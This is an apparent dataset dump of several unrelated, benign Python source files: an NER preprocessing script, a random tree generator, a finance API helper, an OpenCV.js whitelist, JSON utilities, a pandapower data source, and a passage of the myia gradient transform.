content stringlengths 5 1.05M |
|---|
from data_utils.clean_text import clean_text
from data_utils.constants import (B_TOKEN, CHARACTER_SEPARATOR, CLASSES,
I_TOKEN, SPLIT_TOKEN, TAGS,
WORD_TAG_SEPARATOR)
def transform_data(data, word_tokenizer, char_tokenizer):
"""
Args:
data (dict): an object with tags attribute that is an object containing (startIdx, value) as (key, value) pair in which
value is an object with 3 key: 'type', 'end', 'prev'
Returns:
arrays: list of words and corresponding tags.
"""
words = []
labels = []
characters = []
char_length = []
text = data['content']
tags = data['tags']
for start in sorted(int(x) for x in tags.keys()):
tag = tags[str(start)]
end = tag['end']
_type = tag['type']
tokens, _ = clean_text(text[start:end])
words.extend(
str(x) for x in word_tokenizer.texts_to_sequences([tokens])[0]
)
tokens = tokens.split()
characters.extend(
CHARACTER_SEPARATOR.join(str(x) for x in char_tokenizer.texts_to_sequences([x.strip()])[0]) for x in tokens
)
char_length.extend(str(len(x.strip())) for x in tokens)
if _type == 'normal':
labels.extend(CLASSES[TAGS[_type]] for _ in tokens)
else:
labels.extend(
CLASSES[B_TOKEN.format(TAGS[_type])] if i == 0 else CLASSES[I_TOKEN.format(TAGS[_type])] for i, _ in enumerate(tokens)
)
return words, characters, char_length, labels
if __name__ == '__main__':
import json
import pickle
import os
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--word_tokenizer', type=str,
default='./output/word_tokenizer.pkl')
parser.add_argument('--char_tokenizer', type=str,
default='./output/char_tokenizer.pkl')
parser.add_argument('--output', type=str, default='./output/data')
parser.add_argument('--input', type=str, default='./data/train')
args = parser.parse_args()
with open(args.word_tokenizer, 'rb') as file:
word_tokenizer = pickle.load(file)
with open(args.char_tokenizer, 'rb') as file:
char_tokenizer = pickle.load(file)
data = [filename for filename in os.listdir(
args.input) if filename.endswith('.json')]
class_count = {}
for filename in data:
with open(os.path.join(args.input, filename), 'r') as file:
data = json.load(file)
# print(char_tokenizer.word_index)
# print(word_tokenizer.word_index)
for i, v in enumerate(data):
if 'tags' not in v:
continue
for tag in v['tags'].values():
tag = tag['type']
if class_count.get(tag):
class_count[tag]['count'] += 1
else:
class_count[tag] = {'count': 1}
path = os.path.join(args.output, filename.split('.')[0])
if not os.path.exists(path):
os.makedirs(path)
with open(os.path.join(path, '{}.txt'.format(i)), 'w') as file:
a, b, c, d = transform_data(
v, word_tokenizer, char_tokenizer
)
file.write(SPLIT_TOKEN.join('\t'.join(token)
for token in zip(a, b, c, d)))
import pandas as pd
final_counts = pd.DataFrame.from_dict(class_count, 'index')
final_counts.to_csv('output/class_count.csv')
print(final_counts)
|
# -*- coding: utf-8 -*-
import random
import Vertex
import numpy as np
class Tree():
size_of_v = 0
size_of_e = 0
V = np.array([], Vertex.Vertex)
E = None
origin = 0
max_deg_v = None # Vertex type
# Random Tree Generator:
def __init__(self, size):
if size == 0:
return
self.size_of_v = size
self.size_of_e = size - 1
self.origin = size
maximum_degree = 0
much_left = self.size_of_e
size_A = random.randint(1, size - 1)
size_B = size - size_A
is_good = False
while not is_good:
self.E = np.zeros((size, size))
for i in range(0, size):
self.V = np.insert(self.V, i, Vertex.Vertex(i, 0))
A_index = 0
B_index = size_A
self.max_deg_v = self.V[0]
if size_A >= size_B:
for i in range(B_index, size):
# Index 'i' represents the B side.
self.E[A_index][i] = True
self.E[i][A_index] = True
self.V[i].AddNei(A_index)
self.V[A_index].AddNei(i)
much_left -= 1
A_index += 1
while much_left != 0:
if A_index == size_A:
A_index = 0
x = random.randint(size_A, size - 1) # x is an index for side B.
if self.E[A_index][x]:
A_index += 1
continue
much_left -= 1
self.E[A_index][x] = True
self.E[x][A_index] = True
self.V[x].AddNei(A_index)
self.V[A_index].AddNei(x)
if self.V[x].degree > maximum_degree:
maximum_degree = self.V[x].degree
self.max_deg_v = self.V[x]
if self.V[A_index].degree > maximum_degree:
maximum_degree = self.V[A_index].degree
self.max_deg_v = self.V[A_index]
A_index += 1
# ************************* End Of 1st condition ************
else:
for i in range(0, size_A):
# Index 'i' represents the A side.
self.E[B_index][i] = True
self.E[i][B_index] = True
self.V[i].AddNei(B_index)
self.V[B_index].AddNei(i)
B_index += 1
much_left -= 1
while much_left != 0:
if B_index == size:
B_index = size_A
x = random.randint(0, size_A - 1) # x is an index for side A.
if self.E[B_index][x]:
B_index += 1
continue
much_left -= 1
self.E[B_index][x] = True
self.E[x][B_index] = True
self.V[x].AddNei(B_index)
self.V[B_index].AddNei(x)
if self.V[x].degree > maximum_degree:
maximum_degree = self.V[x].degree
self.max_deg_v = self.V[x]
if self.V[B_index].degree > maximum_degree:
maximum_degree = self.V[B_index].degree
self.max_deg_v = self.V[B_index]
B_index += 1
# ************************ End of 2nd Condition ******************************
is_good = self.BFS(size)
if not is_good:
self.V = np.array([], Vertex.Vertex)
maximum_degree = 0
# ************************************ End of __init__ ***************************************
def SubGraph(self, index_to_remove: Vertex.Vertex, x_or_nx: bool):
newT = Tree(0)
newT.size_of_v = self.size_of_v
newT.V = np.array(self.V, Vertex.Vertex)
# newT.V = self.V
newT.origin = self.origin
newT.size_of_e = self.size_of_e
newT.max_deg_v = newT.V[0]
maxi = 0
if x_or_nx: # T - x, xEV
# print(' Visiting {0}, for T - x, when |V| = {1}'.format(index_to_remove.GetIndex(), self.size_of_v))
for v in newT.V:
if v.AreNeighbors(index_to_remove.ind):
v.RemoveNeigh(index_to_remove.ind)
newT.size_of_e -= 1
if v.GetDegree() > maxi and v.ind != index_to_remove.ind:
maxi = v.GetDegree()
newT.max_deg_v = v
newT.V = newT.V[newT.V != index_to_remove]
newT.size_of_v -= 1
# T - N[x], xEV
else:
newT.size_of_v -= 1
# print(' Visiting {0}, for T - N[x], when |V| = {1}'.format(index_to_remove.GetIndex(), self.size_of_v))
tmpo_to_remove = []
for v in newT.V:
if v.AreNeighbors(index_to_remove.ind):
tmpo_to_remove.append(v.ind)
newT.V = newT.V[newT.V != v]
newT.size_of_v -= 1
newT.V = newT.V[newT.V != index_to_remove.ind]
for v in newT.V:
for index in tmpo_to_remove:
if v.AreNeighbors(index):
v.RemoveNeigh(index)
newT.size_of_e -= 1
if v.GetDegree() > maxi and v.ind != index_to_remove.ind:
maxi = v.GetDegree()
newT.max_deg_v = v
return newT
def BFS(self, size):
color = np.repeat(0, self.size_of_v)
num_of_nil = size
num_of_e = 0
color[0] = 1
Que = np.array([], int)
Q_index = 0
np.insert(Que, 0, 0)
while Q_index < self.size_of_v and Q_index <= Que.size:
for i in range(0, self.size_of_v):
if self.E[i][Que[Q_index]] and color[i] == 0:
np.insert(Que, Que.size - 1, i)
color[i] = 1
num_of_e += 1
num_of_nil -= 1
color[Que[Q_index]] = 2
Q_index += 1
if num_of_nil != 1 or num_of_e != self.size_of_e:
return False
return True
# ***************************** End Of BFS *************************************
def isKn(self):
return self.size_of_e == (self.size_of_v * (self.size_of_v - 1) / 2)
def print_rel(self):
print("|V| = {0}".format(self.size_of_v))
print("E = ")
for i in range(0, self.size_of_v):
for j in range(i, self.size_of_v):
if self.E[i][j]:
print('[ V{0}, V{1} ], '.format(i, j))
|
from urllib.request import urlopen
from urllib.error import HTTPError
import json
import pandas as pd
BASE_URL = "https://financialmodelingprep.com/api"
def download(URL):
try:
response = urlopen(URL)
data = json.loads(response.read().decode("utf-8"))
except HTTPError:
raise ValueError("This endpoint is only for premium members. Please visit the subscription page to upgrade the "
"plan (Starter or higher) at https://financialmodelingprep.com/developer/docs/pricing")
if 'Error Message' in data:
raise ValueError(data['Error Message'])
return pd.DataFrame(data)
|
# Classes and methods whitelist
core = {'': ['absdiff', 'add', 'addWeighted', 'bitwise_and', 'bitwise_not', 'bitwise_or', 'bitwise_xor', 'cartToPolar',\
'compare', 'convertScaleAbs', 'copyMakeBorder', 'countNonZero', 'determinant', 'dft', 'divide', 'eigen', \
'exp', 'flip', 'getOptimalDFTSize','gemm', 'hconcat', 'inRange', 'invert', 'kmeans', 'log', 'magnitude', \
'max', 'mean', 'meanStdDev', 'merge', 'min', 'minMaxLoc', 'mixChannels', 'multiply', 'norm', 'normalize', \
'perspectiveTransform', 'polarToCart', 'pow', 'randn', 'randu', 'reduce', 'repeat', 'rotate', 'setIdentity', 'setRNGSeed', \
'solve', 'solvePoly', 'split', 'sqrt', 'subtract', 'trace', 'transform', 'transpose', 'vconcat'],
'Algorithm': []}
imgproc = {'': ['Canny', 'GaussianBlur', 'Laplacian', 'HoughLines', 'HoughLinesP', 'HoughCircles', 'Scharr','Sobel', \
'adaptiveThreshold','approxPolyDP','arcLength','bilateralFilter','blur','boundingRect','boxFilter',\
'calcBackProject','calcHist','circle','compareHist','connectedComponents','connectedComponentsWithStats', \
'contourArea', 'convexHull', 'convexityDefects', 'cornerHarris','cornerMinEigenVal','createCLAHE', \
'createLineSegmentDetector','cvtColor','demosaicing','dilate', 'distanceTransform','distanceTransformWithLabels', \
'drawContours','ellipse','ellipse2Poly','equalizeHist','erode', 'filter2D', 'findContours','fitEllipse', \
'fitLine', 'floodFill','getAffineTransform', 'getPerspectiveTransform', 'getRotationMatrix2D', 'getStructuringElement', \
'goodFeaturesToTrack','grabCut','initUndistortRectifyMap', 'integral','integral2', 'isContourConvex', 'line', \
'matchShapes', 'matchTemplate','medianBlur', 'minAreaRect', 'minEnclosingCircle', 'moments', 'morphologyEx', \
'pointPolygonTest', 'putText','pyrDown','pyrUp','rectangle','remap', 'resize','sepFilter2D','threshold', \
'undistort','warpAffine','warpPerspective','warpPolar','watershed', \
'fillPoly', 'fillConvexPoly'],
'CLAHE': ['apply', 'collectGarbage', 'getClipLimit', 'getTilesGridSize', 'setClipLimit', 'setTilesGridSize']}
objdetect = {'': ['groupRectangles'],
'HOGDescriptor': ['load', 'HOGDescriptor', 'getDefaultPeopleDetector', 'getDaimlerPeopleDetector', 'setSVMDetector', 'detectMultiScale'],
'CascadeClassifier': ['load', 'detectMultiScale2', 'CascadeClassifier', 'detectMultiScale3', 'empty', 'detectMultiScale']}
video = {'': ['CamShift', 'calcOpticalFlowFarneback', 'calcOpticalFlowPyrLK', 'createBackgroundSubtractorMOG2', \
'findTransformECC', 'meanShift'],
'BackgroundSubtractorMOG2': ['BackgroundSubtractorMOG2', 'apply'],
'BackgroundSubtractor': ['apply', 'getBackgroundImage']}
dnn = {'dnn_Net': ['setInput', 'forward'],
'': ['readNetFromCaffe', 'readNetFromTensorflow', 'readNetFromTorch', 'readNetFromDarknet',
'readNetFromONNX', 'readNet', 'blobFromImage']}
features2d = {'Feature2D': ['detect', 'compute', 'detectAndCompute', 'descriptorSize', 'descriptorType', 'defaultNorm', 'empty', 'getDefaultName'],
'BRISK': ['create', 'getDefaultName'],
'ORB': ['create', 'setMaxFeatures', 'setScaleFactor', 'setNLevels', 'setEdgeThreshold', 'setFirstLevel', 'setWTA_K', 'setScoreType', 'setPatchSize', 'getFastThreshold', 'getDefaultName'],
'MSER': ['create', 'detectRegions', 'setDelta', 'getDelta', 'setMinArea', 'getMinArea', 'setMaxArea', 'getMaxArea', 'setPass2Only', 'getPass2Only', 'getDefaultName'],
'FastFeatureDetector': ['create', 'setThreshold', 'getThreshold', 'setNonmaxSuppression', 'getNonmaxSuppression', 'setType', 'getType', 'getDefaultName'],
'AgastFeatureDetector': ['create', 'setThreshold', 'getThreshold', 'setNonmaxSuppression', 'getNonmaxSuppression', 'setType', 'getType', 'getDefaultName'],
'GFTTDetector': ['create', 'setMaxFeatures', 'getMaxFeatures', 'setQualityLevel', 'getQualityLevel', 'setMinDistance', 'getMinDistance', 'setBlockSize', 'getBlockSize', 'setHarrisDetector', 'getHarrisDetector', 'setK', 'getK', 'getDefaultName'],
'SimpleBlobDetector_Params': ['Params'],
'SimpleBlobDetector': ['create'],
'KAZE': ['create', 'setExtended', 'getExtended', 'setUpright', 'getUpright', 'setThreshold', 'getThreshold', 'setNOctaves', 'getNOctaves', 'setNOctaveLayers', 'getNOctaveLayers', 'setDiffusivity', 'getDiffusivity', 'getDefaultName'],
'AKAZE': ['create', 'setDescriptorType', 'getDescriptorType', 'setDescriptorSize', 'getDescriptorSize', 'setDescriptorChannels', 'getDescriptorChannels', 'setThreshold', 'getThreshold', 'setNOctaves', 'getNOctaves', 'setNOctaveLayers', 'getNOctaveLayers', 'setDiffusivity', 'getDiffusivity', 'getDefaultName'],
'DescriptorMatcher': ['add', 'clear', 'empty', 'isMaskSupported', 'train', 'match', 'knnMatch', 'radiusMatch', 'clone', 'create'],
'BFMatcher': ['isMaskSupported', 'create'],
'': ['drawKeypoints', 'drawMatches', 'drawMatchesKnn']}
photo = {'': ['createAlignMTB', 'createCalibrateDebevec', 'createCalibrateRobertson', \
'createMergeDebevec', 'createMergeMertens', 'createMergeRobertson', \
'createTonemapDrago', 'createTonemapMantiuk', 'createTonemapReinhard', 'inpaint'],
'CalibrateCRF': ['process'],
'AlignMTB' : ['calculateShift', 'shiftMat', 'computeBitmaps', 'getMaxBits', 'setMaxBits', \
'getExcludeRange', 'setExcludeRange', 'getCut', 'setCut'],
'CalibrateDebevec' : ['getLambda', 'setLambda', 'getSamples', 'setSamples', 'getRandom', 'setRandom'],
'CalibrateRobertson' : ['getMaxIter', 'setMaxIter', 'getThreshold', 'setThreshold', 'getRadiance'],
'MergeExposures' : ['process'],
'MergeDebevec' : ['process'],
'MergeMertens' : ['process', 'getContrastWeight', 'setContrastWeight', 'getSaturationWeight', \
'setSaturationWeight', 'getExposureWeight', 'setExposureWeight'],
'MergeRobertson' : ['process'],
'Tonemap' : ['process' , 'getGamma', 'setGamma'],
'TonemapDrago' : ['getSaturation', 'setSaturation', 'getBias', 'setBias', \
'getSigmaColor', 'setSigmaColor', 'getSigmaSpace','setSigmaSpace'],
'TonemapMantiuk' : ['getScale', 'setScale', 'getSaturation', 'setSaturation'],
'TonemapReinhard' : ['getIntensity', 'setIntensity', 'getLightAdaptation', 'setLightAdaptation', \
'getColorAdaptation', 'setColorAdaptation']
}
aruco = {'': ['detectMarkers', 'drawDetectedMarkers', 'drawAxis', 'estimatePoseSingleMarkers', 'estimatePoseBoard', 'estimatePoseCharucoBoard', 'interpolateCornersCharuco', 'drawDetectedCornersCharuco'],
'aruco_Dictionary': ['get', 'drawMarker'],
'aruco_Board': ['create'],
'aruco_GridBoard': ['create', 'draw'],
'aruco_CharucoBoard': ['create', 'draw'],
}
calib3d = {'': ['findHomography', 'calibrateCameraExtended', 'drawFrameAxes', 'estimateAffine2D', 'getDefaultNewCameraMatrix', 'initUndistortRectifyMap', 'Rodrigues']}
white_list = makeWhiteList([core, imgproc, objdetect, video, dnn, features2d, photo, aruco, calib3d])
|
import json
from datetime import datetime
import inspect
import json
from .logger import logger
def pretty(x): return print(json.dumps(x, indent=4, default=str))
def prettify(x): return json.dumps(x, indent=4, default=str)
def function_name(): return inspect.stack()[1][3]
def dumps(x, indent=0):
string = json.dumps(x, indent=4, default=str)
lines = [indent*' ' + line for line in string.split('\n')]
return '\n'.join(lines)
def log(x): return print(json.dumps(x, indent=4, default=str))
def dicts_set(a, b, unique_props):
"""
b has precedence
"""
def unique_identifier(d): return tuple([d.get(s) for s in unique_props])
d_a = {unique_identifier(d): d for d in a}
d_b = {unique_identifier(d): d for d in b}
return list({**d_a, **d_b}.values())
def round_time_to(timestamp, seconds=60*30):
t = int(timestamp)
return int(t - (t % seconds))
if __name__ == '__main__':
for i in range(20):
t = round_time_to(datetime.utcnow().timestamp() - 60*23*i, 60*60)
print(datetime.fromtimestamp(t))
|
# -*- coding: utf-8 -*-
# Copyright (c) 2016-2019 by University of Kassel and Fraunhofer Institute for Energy Economics
# and Energy System Technology (IEE), Kassel. All rights reserved.
try:
import pplog
except:
import logging as pplog
import datetime
from pandapower.io_utils import JSONSerializableClass
logger = pplog.getLogger(__name__)
class DataSource(JSONSerializableClass):
"""
This class may hold data from a profile, generate data at random or
just return constant values for a time step. Controllers will call
get_time_step_values(time) in each time step to get new values for e.g. P, Q
"""
def __str__(self):
return self.__class__.__name__
def __repr__(self):
return self.__class__.__name__
def get_time_step_value(self, time_step, profile_name, scale_factor=1.0):
"""
This method retrieves values of the data source according to the given parameters.
For actual parameters look into the DataSource you are actually using.
"""
raise NotImplementedError("Subclasses should implement this!")
class FileData(DataSource):
"""
This class may hold data from a profile, generate data at random or
just return constant values for a time step. Controllers will call
get_time_step_values(time) in each time step to get new values for e.g. P, Q
| **path** - The path to a HDF5-File, containing the data
| **time_res** - Desired time resolution in minutes (default = will infer from timestamps)
"""
def __init__(self, resolution_sec=None, profile_span="epoch"):
super().__init__()
self.time_df = None
self.profile_span = profile_span
self.resolution_sec = resolution_sec
self.update_initialized(locals())
def add_file(self, path):
"""
Adds the contents of a file to the dataframe of this DataSource
"""
raise NotImplementedError("Subclasses should implement this!")
def get_time_step_value(self, time_step, profile_name, scale_factor=1.0):
"""
This method retrieves values of the data source according to the given parameters.
| **time_step** - The time step for which we want to look up values
| **profile_name** - The name of the columns for each profile
| **scale_factor** - A scale factor.
"""
# we converse the time_step in case we only got e.g. monthly profiles
if self.profile_span.lower() == "month":
date_time = datetime.datetime.fromtimestamp(time_step)
new_time_step = (date_time.day - 1) * 86400 + date_time.hour * 3600 + \
date_time.minute * 60 + date_time.second
row = new_time_step
elif self.profile_span.lower() == "day":
date_time = datetime.datetime.fromtimestamp(time_step)
new_time_step = date_time.hour * 3600 + \
date_time.minute * 60 + date_time.second
row = new_time_step
else:
row = time_step
try:
res = self.time_df.at[row, profile_name] * scale_factor
return res
except Exception as e:
logger.warning("Could not read value at profile %s, row %i. Error: %s" % (
str(profile_name), row, e.args))
return 0.0
|
"""Generate the gradient graphs for reverse mode.
The J transform on a graph produces two graphs, the forward graph (fprop)
and the backpropagator graph (bprop). The former returns the result of the
computation and the bprop graph, and the latter takes output sensitivities
and returns input sensitivities. For each node `y = f(x)` of the graph,
we generate:
* Three nodes in the fprop graph, using one GraphRemapper and two
SlaveRemappers (it doesn't really matter which one is the master and
which ones are the slaves):
temp = fprop_f(fprop_x) # FPropAppRemapper (slave)
fprop_y = temp[0] # FPropRemapper (master)
bprop_y = temp[1] # BPropRemapper (slave)
* Two nodes in the bprop graph, using one GraphRemapper and one
SlaveRemapper:
# BPropAppRemapper (slave)
from_y = bprop_y(sens_y)
# SensRemapper (master)
sens_y = hyper_add(from_z[idx] for z, idx in uses(y))
* For the output node, in the fprop graph, we generate:
return fprop_y, bprop_y
* The output of the bprop graph contains the sensitivities of
the free variables and parameters. Sensitivities for free variables
are stored in an Env:
sens_allfvs = env_setitem(newenv, embed(fv1), sens_fv1)
sens_allfvs = env_setitem(sens_allfvs, embed(fv2), sens_fv2)
...
return sens_allfvs, sens_param1, sens_param_2, ...
All remappers generate their nodes first, and then the nodes are linked
with each other, which allows them to refer to each other.
SensRemapper is the most complex one, mainly because it walks through
each node's uses and has to deal with free variables. For any given node,
SensRemapper will generate a sensitivity node in each graph that uses
it, so e.g. in `lambda x: x + (lambda y: x + y)(123)` two different
sensitivity nodes are created for x, because it is used in both lambda
expressions. See `SensRemapper.link_apply` for more information.
"""
from functools import reduce
from ovld import ovld
from . import operations
from .debug.label import short_labeler, short_relation_symbols as syms
from .info import About, NamedDebugInfo
from .ir import (
BasicRemapper,
Constant,
Graph,
RemapperSet,
clone,
manage,
sexp_to_node,
)
from .operations import Primitive, gadd, primitives as P, zeros_like
from .parser import operations_ns
from .utils import InternalInferenceError, OrderedSet, newenv
from .utils.variables import Xs
class GradRemapper(BasicRemapper):
"""GraphRemapper that allows mapping free variables differently."""
def get(self, g, node):
"""Get the new node corresponding to the given (graph, node) pair.
The (g, node) pair corresponds to a use of a node from graph g.
The node may or may not belong to g. Some remappers may ignore
g.
"""
if (g, node) in self.repl:
return self.repl[(g, node)]
elif node in self.repl:
return self.repl[node]
else:
raise AssertionError(f"Unprocessed node: {node}")
class SlaveRemapper(GradRemapper):
"""Maps every node of a graph to new nodes in the master's graphs.
Arguments:
graphs: The graphs to transform.
master: The name of a remapper whose graphs this remapper
will generate nodes into.
relation: The relation between the original node and the new node.
remappers (Optional): A RemapperSet for if the remapped nodes need
to refer to nodes in other remappers.
graph_relation (Optional): The relation between the original graph
and the new graph (defaults to relation).
"""
def __init__(
self, graphs, master, *, relation, remappers=None, graph_relation=None
):
"""Initialize a SlaveRemapper."""
super().__init__(
graphs,
remappers=remappers,
relation=relation,
graph_relation=graph_relation,
)
self._master_name = master
@property
def master(self):
"""Remapper providing the graphs to generate into."""
return self.remappers[self._master_name]
def gen_parameter(self, g, ng, p):
"""Parameters are generated by the master."""
pass
def gen_constant(self, g, ng, ct):
"""Constants are generated by the master."""
pass
def generate(self):
"""Use the same graph_repl as the master."""
self.graph_repl = self.master.graph_repl
def finalize(self):
"""Only the master finalizes."""
pass
class FPropAppRemapper(SlaveRemapper):
"""Generate applications in the forward graph.
This is transform A, generating into transform B's graph.
x = a(b, c) => A:x = (B:a)(B:b, B:c)
"""
def link_apply(self, link):
"""Link generated nodes to their inputs.
x = a(b, c) => A:x = (B:a)(B:b, B:c)
"""
new_inputs = [
self.remappers["grad_fprop"].get(link.graph, inp)
for inp in link.node.inputs
]
link.new_node.inputs = new_inputs
class FPropRemapper(GradRemapper):
"""Generate nodes in the forward graph.
This is transform B.
x = a(b, c) => B:x = (A:x)[0]
"""
def gen_constant(self, g, ng, ct):
"""Constants are wrapped with a call to J."""
with About(ct.debug, self.relation):
self.repl[(g, ct)] = sexp_to_node((P.J, ct), ng)
def gen_constant_graph(self, g, ng, ct):
"""Constant graphs map to their remapped versions.
Graphs that are not remapped are wrapped with J.
"""
if ct.value in self.graphs:
new_ct = Constant(self.get_graph(ct.value))
self.repl[ct] = new_ct
self.repl[ct.value] = new_ct
else:
self.gen_constant(g, ng, ct)
def gen_fv(self, g, ng, fv):
"""Free variables outside the remapped scope are wrapped with J.
Remapped free variables are remapped elsewhere.
"""
if fv.graph not in self.graphs:
return self.gen_constant(g, ng, fv)
def gen_fv_graph(self, g, ng, fvg):
"""Free variables that are graphs are handled like constants."""
if fvg in self.graphs:
return self.gen_constant_graph(g, ng, Constant(fvg))
else:
return self.gen_constant(g, ng, fvg)
def link_apply(self, link):
"""Link generated nodes to their inputs.
x = a(b, c) => B:x = (A:x)[0]
"""
assert not link.node.is_parameter()
app = self.remappers["grad_fprop_app"].get(link.graph, link.node)
link.new_node.inputs = sexp_to_node(
(P.tuple_getitem, app, 0), link.new_graph
).inputs
def finalize_graph(self, g, ng):
"""We generate the pair (B:output, E:g)."""
g.transforms["grad"] = ng
ng.transforms["primal"] = g
g.set_flags("reference")
ng.set_flags("reference")
out = self.get(g, g.output)
bprop = self.remappers["grad_sens"].get_graph(g)
ng.output = ng.apply(P.make_tuple, out, bprop)
def get_jinv(self, node):
"""Generate Jinv(B:node)."""
if (node, "jinv") not in self.repl:
if isinstance(node, Graph):
if node not in self.graphs:
new_node = Constant(node)
else:
assert node.parent is not None
ng = self.get_graph(node.parent)
ct = Constant(self.get_graph(node))
with About(node.debug, "equiv"):
new_node = ng.apply(P.Jinv, ct)
else:
if node.graph not in self.graphs:
new_node = node
else:
ng = self.get_graph(node.graph)
node2 = self.get(None, node)
with About(node.debug, "equiv"):
new_node = ng.apply(P.Jinv, node2)
self.repl[node, "jinv"] = new_node
return self.repl[node, "jinv"]
class BPropRemapper(SlaveRemapper):
"""Generate backpropagators in the forward graph.
This is transform C.
x = a(b, c) => C:x = (A:x)[1]
"""
def link_apply(self, link):
"""Link generated nodes to their inputs.
x = a(b, c) => C:x = (A:x)[1]
"""
app = self.remappers["grad_fprop_app"].get(link.graph, link.node)
link.new_node.inputs = sexp_to_node(
(P.tuple_getitem, app, 1), link.new_graph
).inputs
class BPropAppRemapper(SlaveRemapper):
"""Generate the reverse applications in the backward graph.
This is transform D, generating into transform E's graph.
x = a(b, c) => D:x = (C:x)(E:x)
"""
def link_apply(self, link):
"""Link generated nodes to their inputs.
x = a(b, c) => D:x = (C:x)(E:x)
"""
g = link.graph
node = link.node
assert not node.is_parameter()
fn = self.remappers["grad_bprop"].get(g, node)
arg = self.remappers["grad_sens"].get(g, node)
link.new_node.inputs = [fn, arg]
class SensRemapper(GradRemapper):
"""Generate the sensitivities in the backward graph.
This is transform E.
x, used by y at index i and z at index j =>
E:x = D:y[i] + D:z[j]
"""
def gen_parameter(self, g, ng, p):
"""Generate nodes for parameter sensitivities.
This graph is reversed, so parameter sensitivities are outputs,
not parameters of ng.
"""
self.gen_apply(g, ng, p)
def gen_apply(self, g, ng, node):
"""Generate sensitivities for applications.
* The output node's sensitivity is ng's sole parameter.
* If a node is used in multiple graphs, each graph has a
corresponding sensitivity node.
"""
with About(node.debug, self.relation):
if node is g.output:
new_node = ng.add_parameter()
else:
new_node = ng.apply()
# NOTE: First parameter to remap_node is (g, node) instead of just
# node. This lets us dispatch to a different node depending on whether
# it belongs to the graph that uses it, or is a free variable.
self.remap_node((g, node), g, node, ng, new_node)
def gen_child(self, g, ng, child):
"""Generate sensitivities for child graphs."""
with About(child.debug, self.relation):
self.remap_node((g, child), g, child, ng, ng.apply())
def gen_fv_extended(self, g, ng, node):
"""Generate sensitivities for free variables.
Note that the default gen_fv_extended does nothing, so this is
different behavior.
"""
with About(node.debug, self.relation):
self.remap_node((g, node), g, node, ng, ng.apply())
def gen_fv_graph(self, g, ng, g2):
"""Generate sensitivities for free variables that are graphs."""
with About(g2.debug, self.relation):
self.remap_node((g, g2), g, g2, ng, ng.apply())
def link_apply(self, link):
"""Link generated nodes to their inputs.
x, used by y at index i and z at index j =>
E:x = D:y[i] + D:z[j]
"""
g = link.graph
ng = link.new_graph
node = link.node
new_node = link.new_node
mng = g.manager
assert not new_node.is_parameter()
if isinstance(node, Graph):
# This was added via gen_child or gen_fv_graph
uses = OrderedSet()
for ct in g.constants:
if ct.value is node:
uses |= mng.uses[ct]
else:
uses = mng.uses[node]
contribs = []
for user, key in uses:
if user.graph is g:
# We only concern ourselves with uses in this graph
if user is user.graph.return_:
# This is the graph's output, so the contribution
# is the output sensitivity, which is contained in
# ng's sole parameter.
if len(ng.parameters) == 0:
# This will happen if the graph returns a free
# variable directly.
with About(g.output.debug, "grad_sens"):
ng.add_parameter()
# We need to call identity because we need to modify
# new_node's inputs at the end of the function, we can't
# simply replace it.
sexp = (P.identity, ng.parameters[0])
contribs.append(sexp)
else:
# If the application is e.g. z = f(x, y), BPropAppRemapper
# calculates the tuple (df, dx, dy) = backpropagator_f(dz)
# If we are processing node f, x or y, we will respectively
# get element 0, 1 or 2 of that tuple and add that to our
# contribs list.
src = self.remappers["grad_bprop_app"].get(g, user)
sexp = (P.tuple_getitem, src, key)
contribs.append(sexp)
# TODO: deconstruct nested graphs
# TODO: figure out what I meant by "deconstruct nested graphs" :(
# These are all the graphs nested in g which have this node as a
# free variable. Each of these graphs has a sensitivity node, and
# we will extract contributions from them.
children = {
g2
for g2 in self.graphs
if (g, g2) in self.repl and node in g2.free_variables_extended
}
# This is equivalent to the original node. Note that we aren't really
# interested in the node's value: jinv is used along with embed and
# zeros_like, which only care about the original node's inferred type
# and shape.
jinv = self.grad_fprop.get_jinv(node)
# This represents the node's "key" into the env.
embed = sexp_to_node((operations.embed, jinv), ng)
# This is the default, if there is no entry for this key.
zl = sexp_to_node((zeros_like, jinv), ng)
for child in children:
assert (g, child) in self.repl
sexp = (P.env_getitem, self.get(g, child), embed, zl)
contribs.append(sexp)
n = len(contribs)
if n == 0:
sexp = zl
else:
# All contributions are added together with gadd.
def mkadd(x, y):
return (gadd, x, y)
sexp = reduce(mkadd, contribs)
new_node.inputs = sexp_to_node(sexp, ng).inputs
@property
def grad_fprop(self):
return self.remappers["grad_fprop"]
def finalize_graph(self, g, ng):
"""Generate the output of the backprop graph.
* Sensitivities for all free variables are packed in an
EnvInstance using env_setitem.
* We return a tuple with fv sensitivities first, and then
all parameter sensitivities.
"""
fv_sens = Constant(newenv)
for fv in g.free_variables_extended:
sens = self.get(g, fv)
if sens.is_apply(zeros_like):
# Skip if there is no gradient
continue
fv_sens = ng.apply(
P.env_setitem,
fv_sens,
ng.apply(operations.embed, self.grad_fprop.get_jinv(fv)),
sens,
)
in_sens = [self.get(g, p) for p in g.parameters]
ng.output = ng.apply(P.make_tuple, fv_sens, *in_sens)
if len(ng.parameters) == 0:
# This can happen if the output is a constant. In that case we just
# add a dummy parameter to satisfy the backpropagator protocol.
with About(g.output.debug, "grad_sens"):
ng.add_parameter()
def _grad(root):
graphs = root.scope
remappers = RemapperSet(
graphs,
grad_fprop=FPropRemapper.partial(),
grad_fprop_app=FPropAppRemapper.partial(master="grad_fprop"),
grad_bprop=BPropRemapper.partial(master="grad_fprop"),
grad_sens=SensRemapper.partial(graph_relation="grad_bprop"),
grad_bprop_app=BPropAppRemapper.partial(master="grad_sens"),
)
remappers.run()
return remappers["grad_fprop"].get_graph(root)
@ovld
def Jimpl(prim: Primitive, resources, node):
"""Implement J on a Primitive."""
try:
g = resources.grad_implementations[prim]
err = False
except KeyError: # pragma: no cover
err = True
if g is None:
err = True
if err:
raise InternalInferenceError(
f"Missing a backpropagator for primitive '{prim}'", refs=[node]
)
return resources.convert(g, manage=False)
@ovld # noqa: F811
def Jimpl(graph: Graph, resources, node):
"""Implement J on a Graph."""
return _grad(graph)
@ovld # noqa: F811
def Jimpl(other: object, resources, node):
"""We do not implement J on non-functions here."""
name = type(other).__qualname__
raise NotImplementedError(f"J(::{name}) not implemented")
###############################
# Helpers to define gradients #
###############################
default_grad_flags = {"ignore_values": True, "core": True, "reference": True}
_is_mktuple_resolve = ((operations.resolve, operations_ns, "make_tuple"), Xs)
_is_mktuple_direct = (P.make_tuple, Xs)
_is_raise = (P.raise_, Xs)
def _make_grad_transform(prim, fn, flags):
"""Given a function for the bprop, make the augmented function."""
from .pipeline import standard_parse
